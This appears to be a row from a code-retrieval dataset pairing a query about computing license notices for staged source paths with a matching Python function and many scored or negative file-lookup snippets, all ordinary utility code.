filepath)\n\n return inf_path", "def get_file(_file):\n _file = pathlib.Path(_file)\n if not _file.is_file():\n _file = None\n return _file", "def file_exists(self, path: str) -> Optional[GoogleDriveFile]:\n current_file = self.root\n file_name_list = self._normalized_path_list(path)\n normalized_file_path = \"/\".join(file_name_list)\n logging.info(f\"Checking if {normalized_file_path} exists...\")\n last_index = len(file_name_list) - 1\n for index, file_name in enumerate(file_name_list):\n if current_file.file_name != FileName(file_name):\n return None\n # If not the last item in the path, then get the next file in the path and assign as root\n if index < last_index:\n next_file_name = FileName(file_name_list[index + 1])\n next_file = current_file.get_child(next_file_name)\n # If not last item in path and sub-files don't contain the next item, path doesn't exist\n if next_file is None:\n return None\n current_file = next_file\n else:\n return current_file\n raise Exception(\"Not suppose to reach here. Check function file_exists\")", "def _get_rel_path(self, file_path: Union[str, os.PathLike]) -> Optional[str]:\n file_path = Path(file_path).absolute()\n try:\n # use os.path.relpath instead of Path.relative_to in case file_path is not a child of self.base_path\n return os.path.relpath(file_path, self.base_path)\n except ValueError:\n # 2 paths are on different drives\n return None", "def search_file(filename, search_path, pathsep=os.pathsep):\n for path in string.split(search_path, pathsep):\n candidate = os.path.join(path, filename)\n if os.path.exists(candidate): return os.path.abspath(candidate)\n return None", "def search_file(filename, search_path, pathsep=os.pathsep):\n for path in string.split(search_path, pathsep):\n candidate = os.path.join(path, filename)\n if os.path.exists(candidate): return os.path.abspath(candidate)\n return None", "def get(self, entity, default=None, check_tags=True):\n\n if not isinstance(entity, Entity):\n raise TypeError('path cache keys are entities; got %r %r' % (type(entity), entity))\n\n with self.conn:\n c = self.conn.cursor()\n c.execute('SELECT path FROM entity_paths WHERE entity_type = ? AND entity_id = ?', (entity['type'], entity['id']))\n row = c.fetchone()\n if row is None:\n return default\n path = os.path.abspath(os.path.join(self.project_root, row[0]))\n\n # Make sure that the entity is actually tagged in the given directory.\n # This guards against moving tagged directories. This does NOT\n # effectively guard against copied directories.\n if check_tags:\n if not any(tag['entity'] is entity for tag in self.sgfs.get_directory_entity_tags(path)):\n log.warning('%s %d is not tagged at %s' % (\n entity['type'], entity['id'], path,\n ))\n return default\n\n return path", "def GetTrackerFilePath(dst_url, tracker_file_type, api_selector, src_url=None):\n if tracker_file_type == TrackerFileType.UPLOAD:\n # Encode the dest bucket and object name into the tracker file name.\n res_tracker_file_name = (\n re.sub('[/\\\\\\\\]', '_', 'resumable_upload__%s__%s__%s.url' %\n (dst_url.bucket_name, dst_url.object_name, api_selector)))\n elif tracker_file_type == TrackerFileType.DOWNLOAD:\n # Encode the fully-qualified dest file name into the tracker file name.\n res_tracker_file_name = (\n re.sub('[/\\\\\\\\]', '_', 'resumable_download__%s__%s.etag' %\n (os.path.realpath(dst_url.object_name), api_selector)))\n elif tracker_file_type == TrackerFileType.PARALLEL_UPLOAD:\n # Encode the dest bucket and object names as well as the source file name\n # into the tracker file name.\n res_tracker_file_name = (\n re.sub('[/\\\\\\\\]', '_', 'parallel_upload__%s__%s__%s__%s.url' %\n (dst_url.bucket_name, dst_url.object_name,\n src_url, api_selector)))\n elif tracker_file_type == TrackerFileType.REWRITE:\n # Should use GetRewriteTrackerFilePath instead.\n raise NotImplementedError()\n\n return _HashAndReturnPath(res_tracker_file_name, tracker_file_type)", "def _find_file(self, name, check_dir='c_files'):\n testdir = os.path.dirname(__file__)\n name = os.path.join(testdir, check_dir, name)\n return name", "def find_real_dso_path(dso_path_in_record_file, binary_cache_path):\n if dso_path_in_record_file[0] != '/' or dso_path_in_record_file == '//anon':\n return None\n if binary_cache_path:\n tmp_path = os.path.join(binary_cache_path, dso_path_in_record_file[1:])\n if os.path.isfile(tmp_path):\n return tmp_path\n if os.path.isfile(dso_path_in_record_file):\n return dso_path_in_record_file\n return None", "def check_file(file: Path):\n if Path(file).is_file() or file == \"\":\n return file\n else:\n files = glob.glob(\"./**/\" + file, recursive=True) # find file\n FILE_NOT_FOUND_MSG = f\"File Not Found: {file}\"\n MULTIPLE_FILE_MSG = f\"Multiple files match '{file}', specify exact path:{files}\"\n\n assert len(files), FILE_NOT_FOUND_MSG # assert file was found\n assert len(files) == 1, MULTIPLE_FILE_MSG # assert unique\n return files[0] # return file", "def test_get_file_exists_caching_with_raw_url(self):\n repository = self.remote_repository\n\n self.spy_on(repository._get_file_exists_uncached,\n op=kgb.SpyOpReturn(True))\n\n # Use spy to put key into cache\n self.assertTrue(repository.get_file_exists('PATH', 'd7e96b3'))\n\n # Remove spy to ensure key is still in cache without needing spy\n repository._get_file_exists_uncached.unspy()\n self.assertTrue(repository.get_file_exists('PATH', 'd7e96b3'))\n\n # Does not exist when raw_file_url changed because it is not cached.\n repository.raw_file_url = \\\n 'http://github.com/api/v2/yaml/blob/show/reviewboard/<revision>'\n\n self.assertFalse(repository.get_file_exists('PATH', 'd7e96b3'))", "def get_file(file_info):\n if session_vars.filepath == file_info['filepath']:\n img_file = session_vars.img_file\n else:\n print('loading', file_info['filepath'])\n if file_info['ext']=='fits':\n print('Detected fits image type')\n pyfits = import_fits()\n img_file = pyfits.open(file_info['filepath'])\n else:\n try:\n from PIL import Image\n except ImportError:\n raise ToyzJobError(\n \"You must have PIL (Python Imaging Library) installed to \"\n \"open files of this type\"\n )\n img_file = Image.open(file_info['filepath'])\n session_vars.filepath = file_info['filepath']\n session_vars.img_file = img_file\n return img_file", "def get_file(self, path):\n return self._files.get(self._get_rel_path(path))", "def find_library_or_err(file):\r\n path = find_library(file)\r\n if not path:\r\n err = f\"could not find {file}\"\r\n messages.add(err)\r\n return None\r\n else:\r\n return path", "def find_axfile(name, search_path=[u\".\", u\"$GT3AXISDIR\", u\"$GTOOLDIR/gt3\"]):\n axis_path = map(os.path.expandvars, search_path)\n axis_path = [a for a in axis_path if a.find('$') < 0]\n axis_path = [a for a in axis_path if os.path.exists(a)]\n\n if (opt_debug):\n print('*** axis_path:')\n print(axis_path)\n\n axfile = None\n for axdir in axis_path:\n # print(axdir)\n axfile = os.path.join(axdir, 'GTAXLOC.'+name)\n if (os.path.exists(axfile)):\n break\n\n # print(\"dbg:find_axfile:\",axfile)\n return axfile", "def get_file_from_path(file_path):\n return Utils.get_real_file_path(file_path)", "def find_file(self, filename, pathlist = ['.']):\n if filename.startswith('http://') or filename.startswith('https://'):\n return (urlopen(filename), filename)\n for path in [''] + pathlist:\n filepath = abspath(path + '/' + filename)\n if isfile(filepath):\n f = open(filepath, 'r')\n return (f, filepath)\n raise FileNotFoundError(filename, pathlist)", "def get_file(self, path):\n b_file = self.get_b_file(path)\n if b_file:\n return b_file\n return self.get_a_file(path)", "def lookup(self, file, metadata={}):\n # Return a tuple (fingerprint time, lookup time, result)\n # Times should be in milliseconds\n raise NotImplementedError()", "def _find_file(config, startswith=False):\n remote_files = _get_remote_files(config)\n if startswith:\n remote_folders = {}\n for fname, (pid, _) in remote_files.items():\n remote_folders[os.path.dirname(fname)] = (pid, None)\n remote_files = remote_folders\n\n def glob_match(f1, f2):\n \"\"\"Check for wildcard glob style matches.\n \"\"\"\n if f1.find(\"*\") >= 0:\n if fnmatch.fnmatch(f2, \"*/%s\" % f1):\n return True\n\n def get_file(f):\n if _is_remote(f):\n f = _get_id_fname(f)[-1]\n # handle both bare lookups and project-prefixed\n if f.find(\":\") > 0:\n fproject, f = f.split(\":\")\n else:\n fproject = None\n # check for exact matches\n for project, folder in _remote_folders(config):\n if fproject is None or fproject == project:\n folder_f = os.path.join(folder, f)\n if folder_f in remote_files:\n pid, fid = remote_files[folder_f]\n return \"%s:%s/%s:%s\" % (KEY, fid, pid, folder_f)\n # find any files nested in sub folders or as globs\n out = []\n for project, folder in _remote_folders(config):\n for rfname, (pid, rid) in remote_files.items():\n if rfname.startswith(folder + \"/\") and (rfname.endswith(\"/\" + f) or glob_match(f, rfname)):\n out.append(\"%s:%s/%s:%s\" % (KEY, rid, pid, rfname))\n if len(out) == 1:\n return out[0]\n elif len(out) > 1:\n return out\n return get_file", "def find_in_app(self, app, path):\n storage = self.storages.get(app)\n if storage:\n # only try to find a file if the source dir actually exists\n if storage.exists(path):\n matched_path = storage.path(path)\n if matched_path:\n return matched_path", "def __get_docker_file_path(path):\n if os.path.isfile(path):\n return path\n for dc_filename in DEFAULT_DC_FILENAMES:\n file_path = os.path.join(path, dc_filename)\n if os.path.isfile(file_path):\n return file_path\n # implicitly return None", "def track_path(self, filename):\n return os.path.join(os.path.dirname(__file__), 'testdata', filename)", "def track_path(self, filename):\n return os.path.join(os.path.dirname(__file__), 'testdata', filename)", "def track_path(self, filename):\n return os.path.join(os.path.dirname(__file__), 'testdata', filename)", "def find_metadata_file(diagnostics_dir, file_pattern, verbose=False):\n if not diagnostics_dir:\n return None\n metadata_dir = os.path.dirname(diagnostics_dir) + '/metadata'\n if not os.path.isdir(metadata_dir):\n if verbose:\n print(\"Unable to find metadata dir at\", metadata_dir)\n return None\n metafiles = sorted(glob.glob(metadata_dir+'/'+file_pattern))\n if len(metafiles) == 0:\n if verbose:\n print(\"Unable to find metdata file wiht pattern {} in {}\".format(file_pattern, metadata_dir))\n return None\n metadata_file = metafiles[0]\n return metadata_file", "def get_file(self, filename, handler=False):\n result = None\n if self.exists(filename):\n file_path = join_paths(self.path, filename)\n if handler:\n result = open(file_path, 'rb')\n else:\n result = file_path\n return result", "def version_file(self) -> Optional[Path]:\n for path in [self.path, self.path.parent]:\n test_path = path / TF_VERSION_FILENAME\n if test_path.is_file():\n LOGGER.debug(\"using version file: %s\", test_path)\n return test_path\n return None", "def info_file_path_abs(self) -> Path:\n return Path(self._repo.working_tree_dir, \"INFO.yaml\")", "def results_file(self, filename, check_exists=False):\n return self._file_in_subdir(self.results_dir, filename, check_exists)", "async def get_track(self) -> Optional[str]:\n ...", "def try_as_file(inp):\n file = pathlib.Path(inp)\n\n if not file.is_absolute():\n file = pathlib.Path.cwd() / file\n\n if not file.exists():\n return None\n\n try:\n # this will throw if it is a symlink that has a loop in it so that it\n # never points to a base file.\n if file.is_file():\n return file\n except OSError as ex:\n raise Except.FunctionError(\"resolving file '{}' failed: {}\".format(\n file, ex.strerror.lower() ) )\n return None", "def find_library(file):\r\n search_paths = [pathlib.Path(\"/usr/local/lib/x86_64-linux-gnu\"),\r\n pathlib.Path(\"/lib/x86_64-linux-gnu\"),\r\n pathlib.Path(\"/usr/lib/x86_64-linux-gnu\"),\r\n pathlib.Path(\"/usr/local/lib64\"),\r\n pathlib.Path(\"/lib64\"),\r\n pathlib.Path(\"/usr/lib64\"),\r\n pathlib.Path(\"/usr/local/lib\"),\r\n pathlib.Path(\"/lib\"),\r\n pathlib.Path(\"/usr/lib\"),\r\n pathlib.Path(\"/usr/x86_64-linux-gnu/lib64\"),\r\n pathlib.Path(\"/usr/x86_64-linux-gnu/lib\")]\r\n\r\n for path in search_paths:\r\n full = path.joinpath(file)\r\n if full.is_file():\r\n return str(full)\r\n return None", "def find_file(line, column, *, cwd=None):\n cwd = cwd or pathlib.Path()\n path = None\n for finder in finders:\n path, lineno = finder(line, column, cwd)\n if path is not None:\n break\n\n if path is None:\n return None, None\n else:\n return path, lineno", "def search_file(filename, search_path):\n file_path = None\n for path in search_path:\n if exists(join(path, filename)):\n file_path = path\n break\n if file_path:\n return abspath(join(file_path, filename))\n return None", "def test_get_track_path_raises_value_error_if_path_is_not_existing_file(self, example_group, monkeypatch):\n track_list = example_group.track_lists[0]\n track = track_list.tracks[0]\n track.file = \"file.mp3\"\n monkeypatch.setattr(\n \"src.music.utils.get_track_list_root_directory\", MagicMock(return_value=\"root/dir/\")\n ) # non-existing dir\n with pytest.raises(ValueError):\n utils.get_track_path(example_group, track_list, track)", "def getfilemeta(path):\n if os.path.isfile(path):\n meta = os.stat(path)\n return (meta)\n else:\n raise Exception('File not exist')", "def get_file_info_by_token(token):\n\n key = generate_access_token_cache_key(token)\n value = cache.get(key)\n if not value:\n logger.error('No wopi cache value when first get %s' % key)\n value = cache.get(key)\n\n return value if value else None", "def findFileForRun(self,run,time=0):\n graphid = 0\n if time:\n query = \"SELECT graphid FROM Version WHERE timeStamp=%s AND maxRunNumber>=%s AND minRunNumber<=%s\"%(time,run,run)\n tup = self.fetchOne(query)\n if tup and tup[0]:\n graphid = tup[0]\n\n\tquery = \"SELECT locationFileId FROM Location WHERE run=%s\"%(run)\n if graphid:\n query+=\" AND graphid=%s\"%graphid\n elif not graphid and time:\n print \"No matched timeStamp found, continue searching in all graphs.\"\n\ttup = self.fetchAll(query)\n print \"For given run %s\"%(run,)\n\tif not len(tup):\n\t print \"No files found\"\n\t return\n\tfor x in tup:\n\t locId = x[0]\n\t query = \"SELECT fileName FROM FileID WHERE fileId=%s\"%locId\n\t res = self.fetchOne(query)\n locFileName = res[0]\n\t # locInfo=[streamNames,pdsIDList,oDict,recordSize,positionOfFirstRecord]\n\t locInfo = lpds_dump.locationFileParser(locFileName)\n for pdsId in locInfo[1]:\n\t query = \"SELECT fileName FROM FileID WHERE fileId=%s\"%pdsId\n\t\tresult= self.fetchOne(query)\n print result[0]", "def file_location(self) -> str:\n if os.path.exists(self._file_path):\n return \"The file ({}) is located in the path ({})\".format(self._file_name, self._file_path)\n else:\n raise FileNotFoundError", "def _find_histfile_var(file_list, default=None):\n for f in file_list:\n f = expanduser_abs_path(f)\n if not os.path.isfile(f):\n continue\n with open(f, 'r') as rc_file:\n for line in rc_file:\n if line.startswith('HISTFILE='):\n hist_file = line.split('=', 1)[1].strip('\\'\"\\n')\n hist_file = expanduser_abs_path(hist_file)\n if os.path.isfile(hist_file):\n return hist_file\n else:\n if default:\n default = expanduser_abs_path(default)\n if os.path.isfile(default):\n return default", "async def get_or_fetch_local_tails_path(self):\n tails_file_path = self.get_receiving_tails_local_path()\n if Path(tails_file_path).is_file():\n return tails_file_path\n return await self.retrieve_tails()", "def _file_in_subdir(self, subdir, filename, check_exists=False):\n filepath = join(self.dir, subdir, filename)\n\n if check_exists and not isfile(filepath) and not isdir(filepath):\n\n # Try the filename as a pattern or regex before failing:\n matches = self._files_in_subdir(subdir,\n pattern='**/*{}*'.format(filename),\n regex=None)\n\n # Don't accept ambiguous patterns!\n if len(matches) == 1:\n return matches[0]\n\n raise FileNotFoundError(filepath)\n\n return filepath", "def stat (self, path):\r\n pass", "def isFile(self,fin,path=None,extention=None,head=\"check file exist\",exit_on_error=False,logmsg=False):\n \n fck = \"\"\n try:\n if path.strip(): fck = path + \"/\"\n except:\n pass\n \n if fin:\n fck += fin\n if extention:\n fck += extention\n f = os.path.abspath(self.expandvars(fck))\n # f = os.path.abspath(os.path.expandvars(os.path.expanduser(fin)))\n if os.path.isfile(f):\n if logmsg:\n logger.info(head + \"\\n --> file exist: {}\\n -> abs file{:>18} {}\".format(fck,':',f))\n return f\n #--- error no such file\n logger.error(head + \"\\n --> no such file or directory: {}\\n -> abs file{:>18} {}\".format(fck,':',f))\n if exit_on_error:\n raise SystemError(\"File not exists: {}\".format(f) )\n return False", "def _get_path_or_dummy(self, fuse_path):\n cache_path = self.converter.to_cache_path(fuse_path)\n dummy_cache_path = self.converter.add_dummy_ending(cache_path)\n if os.path.exists(cache_path):\n return cache_path\n elif os.path.exists(dummy_cache_path):\n return dummy_cache_path\n return None", "def read_symbolic_ref(self, path: str) -> Optional[Tuple[str, str]]:\n path = posixpath.join(self._path, path)\n self._trace(\"fetching symbolic ref: %s\" % path)\n try:\n meta, resp = self._connection.files_download(path)\n ref = resp.content.decode(\"utf8\")\n ref = ref[len(\"ref: \") :].rstrip()\n rev = meta.rev\n return (rev, ref)\n except dropbox.exceptions.ApiError as e:\n if not isinstance(e.error, dropbox.files.DownloadError):\n raise\n return None", "def identify_file(self, file):", "def result_file(file_path: str) -> Union[str, None]:\n if not os.path.isdir(file_path):\n return None\n else:\n file_list = list()\n for file in os.listdir(file_path):\n file_list.append(file)\n if not file_list or len(file_list) > 1:\n # it should be just one file per file_id directory\n return None\n else:\n return file_list[0]", "def find_file_by_binary(**kwargs):\n return AppServer.service.find_file_by_binary(binary=kwargs['binary'])", "def storage_get_report_file(self, report_pk):\n return self._get_queryset(pk=report_pk).get()", "def find_file(research_structure, raise_on_all_missing=True):\n filenames = []\n paths_searched = []\n ## config file lookup resolution\n for enforce_file_existence, fun in research_structure:\n candidate = fun()\n if candidate is None:\n continue\n if not os.path.exists(candidate):\n if enforce_file_existence:\n raise ValueError(\"File %r does not exists.\" % candidate)\n else:\n paths_searched.append(candidate)\n else:\n return candidate\n if not filenames and raise_on_all_missing:\n raise ValueError(\"No config file was found in those paths: %s.\"\n % ', '.join(paths_searched))\n return", "def valid_file(self, path_to_torrent):\n \n if file and os.path.isfile(path_to_torrent):\n return path_to_torrent\n else:\n return None", "def _mpd_lookup_track(track):\n \n args = [\"artist\", track[\"artist\"].encode(\"utf-8\"), \"title\", track[\"title\"].encode(\"utf-8\")]\n hits = []\n \n for match in _mpd_client.find(*args) + _mpd_client.search(*args):\n hits.append(match[\"file\"])\n \n return hits", "def _find_ref_fname(fname, ref_fname):\n curr_dir = \"\"\n next_dir = os.path.dirname(os.path.abspath(fname))\n while next_dir != curr_dir:\n curr_dir = next_dir\n rcfile = os.path.join(curr_dir, ref_fname)\n if os.path.exists(rcfile):\n return rcfile\n next_dir = os.path.dirname(curr_dir)\n return \"\"", "def _get_source_path(self, docmeta: DocMetadata) -> Optional[str]:\n identifier = docmeta.arxiv_identifier\n version = docmeta.version\n file_noex = identifier.filename\n if not docmeta.is_latest:\n parent_path = self._get_parent_path(identifier, version)\n file_noex = f'{file_noex}v{version}'\n else:\n parent_path = self._get_parent_path(identifier)\n\n for extension in VALID_SOURCE_EXTENSIONS:\n possible_path = os.path.join(\n parent_path,\n f'{file_noex}{extension[0]}')\n if os.path.isfile(possible_path):\n return possible_path\n return None", "def file_hl_group(self, file, stat_res=None, stat_error=None):\n if stat_error is not None:\n return 'Error'\n if stat_res is None:\n return self.file_hl_group(file, *stat_path(file))\n mode = stat_res.st_mode\n if not S_ISREG(mode): # Not a regular file\n if S_ISLNK(mode):\n if self._colors_special.get('ln') == 'target':\n # TODO\n # resolved = file.resolve()\n # if resolved == file:\n # # Don't try to resolve another time\n # # TODO\n # raise Exception('recursion! %s' % resolved)\n return self.file_hl_group(file,\n *stat_path(file, lstat=False))\n else:\n ansi_color = self._colors_special.get('ln')\n elif S_ISCHR(mode):\n ansi_color = self._colors_special.get('cd')\n elif S_ISDIR(mode):\n ansi_color = self._colors_special.get('di')\n elif S_ISFIFO(mode):\n ansi_color = self._colors_special.get('pi')\n elif S_ISBLK(mode):\n ansi_color = self._colors_special.get('bd')\n elif S_ISSOCK(mode):\n ansi_color = self._colors_special.get('so')\n else:\n # TODO Does this happen?\n return 'Error'\n elif mode & S_IXUSR: # Executable\n ansi_color = self._colors_special.get('ex')\n else: # Regular file\n needle = file.name.lower()\n for pattern, colorcode in self._colors.items():\n if needle.endswith(pattern):\n ansi_color = colorcode\n break\n else:\n # TODO Could not find a target color\n return None\n if ansi_color is None:\n return None\n hl_group = 'color' + ansi_color.replace(';', '_')\n return hl_group", "def _fetch_pathinfo(portal, storage, path):\n\n try:\n pinfo = storage.pathinfo(path)\n except PathNotFoundError:\n raise StorageArchiveError(path)\n\n if pinfo.get('external'):\n parsed = urlparse(pinfo['external']['location'])\n rev = pinfo['external']['rev']\n ob = portal.restrictedTraverse(parsed.path[1:])\n storage = queryAdapter(ob, IStorage)\n if storage:\n storage.checkout(rev)\n return _fetch_pathinfo(portal, storage, pinfo['external']['path'])\n\n if pinfo['mimetype']():\n return path, storage.file(path)\n\n # can't find anything\n raise StorageArchiveError(path)", "def get_specfile_path_from_repo(project: GitProject, ref: str = None) -> Optional[str]:\n spec_files = project.get_files(ref=ref, filter_regex=r\".+\\.spec$\")\n\n if not spec_files:\n logger.debug(f\"No spec file found in {project.full_repo_name!r}\")\n return None\n return spec_files[0]", "def spdx_file(self) -> Optional[pulumi.Input['FileNoteArgs']]:\n return pulumi.get(self, \"spdx_file\")", "def get_absolute_path(self):\n if self.datafile and self.datafile.storage.exists(self.datafile.path):\n return self.datafile.path\n else:\n return None", "def FindBinary( binary, user_options ):\n\n def _FindPath():\n key = '{0}_binary_path'.format( binary )\n if user_options.get( key ):\n return user_options[ key ]\n return GO_BINARIES.get( binary )\n\n binary_path = _FindPath()\n if os.path.isfile( binary_path ):\n return binary_path\n return None", "def get_file(self, remote_path, local_path, storage_id=None):\n return self.get(remote_path, local_path, directory=False, storage_id=storage_id)", "def retrieve(self, file_name):\n ret = os.path.join(self.path, file_name)\n temp = (self.path + file_name).find(self.path, 1, -1)\n if os.path.exists(ret):\n return os.path.join(self.path, file_name)\n elif temp != -1:\n if os.name == \"posix\":\n return os.getcwd() + '/' + file_name\n else:\n return os.getcwd() + '\\\\' + file_name\n else:\n return None", "def stats(self, file, **options):\n\n options['file'] = file\n\n return self._get('stats', **options)", "def get_file(view: sublime.View, string: str, name: str) -> 'Tuple[str, Optional[str]]':\n\n # if it's an absolute path get it\n if osp.isabs(string):\n return string, None\n\n # if search_mode: \"project\", search only in project\n elif Settings.search_mode == \"project\":\n # Get base project folders\n base_folders = sublime.active_window().folders()\n # if \"recursive\": true, recursively search for the name\n if Settings.recursive:\n ch_rec = check_recursive(base_folders, name)\n if ch_rec:\n base_folder, root = ch_rec\n return osp.join(root, name), base_folder\n return \"\", None\n else:\n # search only in base folders for the relative path\n for base_folder in base_folders:\n file_name = osp.normpath(osp.join(base_folder, string))\n if osp.exists(file_name):\n return file_name, base_folder\n return \"\", None\n # if search_mode: \"file\" join the relative path to the file path\n else:\n return osp.normpath(osp.join(osp.dirname(view.file_name()), string)), None", "def get_tracking_uri():\n global _tracking_uri\n if _tracking_uri is not None:\n return _tracking_uri\n elif env.get_env(_TRACKING_URI_ENV_VAR) is not None:\n return env.get_env(_TRACKING_URI_ENV_VAR)\n else:\n return os.path.abspath(\"./mlruns\")", "def fetch_library_file_path(file_name: str):\n file_path = os.path.join(library_dir, file_name)\n\n if os.path.exists(file_path) == False:\n add_library_file(file_name)\n\n return file_path", "def lookup_ifproc_file(obsnum, path='/data_lmt/ifproc/', debug=False):\n paths = [path]\n\n if 'ifproc' not in path:\n paths += ['/data_lmt/ifproc/']\n if 'lmtttpm' not in path:\n paths += ['/data_lmt/lmttpm/']\n if 'tel' not in path:\n paths += ['/data_lmt/tel/']\n\n if debug:\n print(paths)\n\n for path in paths:\n filenames = glob.glob(os.path.join(path, '*_%06d_*.nc' % obsnum))\n if len(filenames) > 0:\n if debug:\n print('found %s' % (filenames[0]))\n return filenames[0]\n return ''\n #filename = ''\n #for file in os.listdir(path):\n # if fnmatch.fnmatch(file,'*_%06d_*.nc'%(obsnum)):\n # print('found %s'%(file))\n # filename = path+file\n #if filename == '':\n #print('lookup_ifproc_file: no file for obsnum ', obsnum)\n #if 'lmttpm' not in path:\n # print('look in lmttpm')\n # return lookup_ifproc_file(obsnum,path='/data_lmt/lmttpm/')\n #return(filename)", "def FindFile(self, fd):\n hashes = self._HashFile(fd)\n if not hashes:\n return False\n\n hash_urn = self.PATH.Add(str(hashes.sha1))\n\n for data in aff4.FACTORY.Stat([hash_urn], token=self.token):\n return data[\"urn\"]\n\n return False", "def _guess_log_path(hint: Union[str, pathlib.Path]=None) -> pathlib.Path:\n path = pathlib.Path(hint) if hint else None\n home = os.environ.get('HOME', os.environ.get('USERPROFILE'))\n\n if path and path.exists():\n if path.is_file():\n return path\n elif not path.is_dir():\n return None\n elif home:\n path = pathlib.Path(home) / 'Documents'\n else:\n return None\n\n results = list(path.glob('PwrData*.csv'))\n\n if results:\n return sorted(results)[-1]" ]
[ "0.54929686", "0.5405405", "0.5390188", "0.538945", "0.52806234", "0.52451473", "0.524215", "0.5137974", "0.5047577", "0.502459", "0.50199705", "0.49906838", "0.4970432", "0.49497023", "0.4910103", "0.4907254", "0.48910886", "0.48726743", "0.48697725", "0.4835479", "0.48274845", "0.48164198", "0.4797407", "0.4785708", "0.47653246", "0.47639638", "0.47590125", "0.47358558", "0.47353184", "0.47322643", "0.4729406", "0.47277647", "0.47207966", "0.47207966", "0.46901944", "0.46830073", "0.46741968", "0.4656383", "0.46545762", "0.46474802", "0.46446073", "0.46436766", "0.46376404", "0.46250677", "0.46218884", "0.46215776", "0.46132746", "0.46119773", "0.46105984", "0.46036965", "0.45975855", "0.45880875", "0.45880875", "0.45880875", "0.45831123", "0.45707238", "0.45664722", "0.4551773", "0.455032", "0.45480716", "0.45236108", "0.45219412", "0.45008376", "0.4492937", "0.44927287", "0.4491548", "0.44832098", "0.44752914", "0.44707897", "0.446161", "0.445814", "0.44480854", "0.44448483", "0.4443911", "0.44410315", "0.4433302", "0.44315612", "0.4425981", "0.4424705", "0.44241259", "0.44198808", "0.4398443", "0.4397191", "0.43893695", "0.4369303", "0.43597493", "0.43552536", "0.4345248", "0.43419358", "0.43385822", "0.43381622", "0.4334609", "0.43336794", "0.43321478", "0.43319124", "0.43282804", "0.4326255", "0.43208495", "0.431723", "0.43136153" ]
0.718714
0
Compute the notices object as if the two paths were properly staged. analyze_diffs needs to be independent of staging. Staging might not have been run, or might be out of date from when analyze_diffs is run. So we make a best attempt to reconstruct the notices that would have occurred poststaging.
def _compute_staged_notices(mods_path, third_party_path): mods_notices = notices.Notices() if mods_path: mods_notices.add_sources([mods_path]) third_party_notices = notices.Notices() if third_party_path: third_party_notices.add_sources([third_party_path]) # If there are mods and third_party notices, pick the one that is more # specific to the file, which is the one that has a deeper path. if (_count_directory_levels_in_license_root(third_party_notices) > _count_directory_levels_in_license_root(mods_notices)): return third_party_notices else: return mods_notices
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_diffs(history):\n\n # First get all possible representations\n mgr = plugins_get_mgr() \n keys = mgr.search('representation')['representation']\n representations = [mgr.get_by_key('representation', k) for k in keys]\n\n for i in range(len(history)):\n if i+1 > len(history) - 1:\n continue\n\n prev = history[i]\n curr = history[i+1]\n\n #print(prev['subject'], \"==>\", curr['subject'])\n #print(curr['changes'])\n for c in curr['changes']:\n \n path = c['path']\n\n # Skip the metadata file\n if c['path'].endswith('datapackage.json'): \n continue \n\n # Find a handler for this kind of file...\n handler = None \n for r in representations: \n if r.can_process(path): \n handler = r \n break \n \n if handler is None: \n continue \n\n # print(path, \"being handled by\", handler)\n\n v1_hex = prev['commit']\n v2_hex = curr['commit']\n\n temp1 = tempfile.mkdtemp(prefix=\"dgit-diff-\") \n \n try: \n for h in [v1_hex, v2_hex]: \n filename = '{}/{}/checkout.tar'.format(temp1, h)\n try:\n os.makedirs(os.path.dirname(filename))\n except:\n pass \n extractcmd = ['git', 'archive', '-o', filename, h, path]\n output = run(extractcmd)\n if 'fatal' in output: \n raise Exception(\"File not present in commit\") \n with cd(os.path.dirname(filename)): \n cmd = ['tar', 'xvf', 'checkout.tar']\n output = run(cmd) \n if 'fatal' in output: \n print(\"Cleaning up - fatal 1\", temp1)\n shutil.rmtree(temp1)\n continue \n\n # Check to make sure that \n path1 = os.path.join(temp1, v1_hex, path) \n path2 = os.path.join(temp1, v2_hex, path) \n if not os.path.exists(path1) or not os.path.exists(path2): \n # print(\"One of the two output files is missing\") \n shutil.rmtree(temp1)\n continue \n\n #print(path1, path2) \n\n # Now call the handler\n diff = handler.get_diff(path1, path2)\n\n # print(\"Inserting diff\", diff)\n c['diff'] = diff\n\n except Exception as e: \n #traceback.print_exc() \n #print(\"Cleaning up - Exception \", temp1)\n shutil.rmtree(temp1)", "def apply_decisions(base, decisions):\n\n merged = copy.deepcopy(base)\n prev_path = None\n parent = None\n last_key = None\n resolved = None\n diffs = None\n # clear_parent actions should override other decisions on same obj, so\n # we need to track it\n clear_parent_flag = False\n for md in decisions:\n path, line = split_string_path(merged, md.common_path)\n # We patch all decisions with the same path in one op\n if path == prev_path:\n # Same path as previous, collect entry\n if clear_parent_flag:\n # Another entry will clear the parent, all other decisions\n # should be dropped\n pass\n else:\n if md.action == \"clear_parent\":\n clear_parent_flag = True\n # Clear any exisiting decsions!\n diffs = []\n ad = resolve_action(resolved, md)\n if line:\n ad = push_path(line, ad)\n diffs.extend(ad)\n\n else:\n # Different path, start a new collection\n if prev_path is not None:\n # First, apply previous diffs\n if parent is None:\n # Operations on root create new merged object\n merged = patch(resolved, diffs)\n else:\n # If not, overwrite entry in parent (which is an entry in\n # merged). This is ok, as no paths should point to\n # subobjects of the patched object\n parent[last_key] = patch(resolved, diffs)\n\n prev_path = path\n # Resolve path in base and output\n resolved = merged\n parent = None\n last_key = None\n for key in path:\n parent = resolved\n resolved = resolved[key] # Should raise if key missing\n last_key = key\n diffs = resolve_action(resolved, md)\n if line:\n diffs = push_path(line, diffs)\n clear_parent_flag = md.action == \"clear_parent\"\n # Apply the last collection of diffs, if present (same as above)\n if prev_path is not None:\n if parent is None:\n merged = patch(resolved, diffs)\n else:\n parent[last_key] = patch(resolved, diffs)\n\n merged = nbformat.from_dict(merged)\n return merged", "def compute_audit(self):\r\n \r\n time = datetime.now()\r\n H0_dist = []\r\n Ha_dist = []\r\n\r\n for i in range(0, self.m):\r\n #print(\"CURRENT H0 dist: \", H0_dist)\r\n #try:\r\n H0_dist = self.next_round_dist(True, H0_dist, i)\r\n Ha_dist = self.next_round_dist(False, Ha_dist, i)\r\n '''\r\n except Exception as e:\r\n \r\n print(e)\r\n self.bad = H0_dist\r\n self.bad2 = Ha_dist\r\n return\r\n '''\r\n self.decide_k_min(H0_dist, Ha_dist, i)\r\n #print('ROUND INDEX: ',i,'kminschedl: ',self.k_min_sched[i])\r\n\r\n #self.truncate_dist(H0_dist, i)\r\n H0_dist = H0_dist[:self.k_min_sched[i]]\r\n #self.truncate_dist(Ha_dist, i)\r\n Ha_dist = Ha_dist[:self.k_min_sched[i]]\r\n \r\n 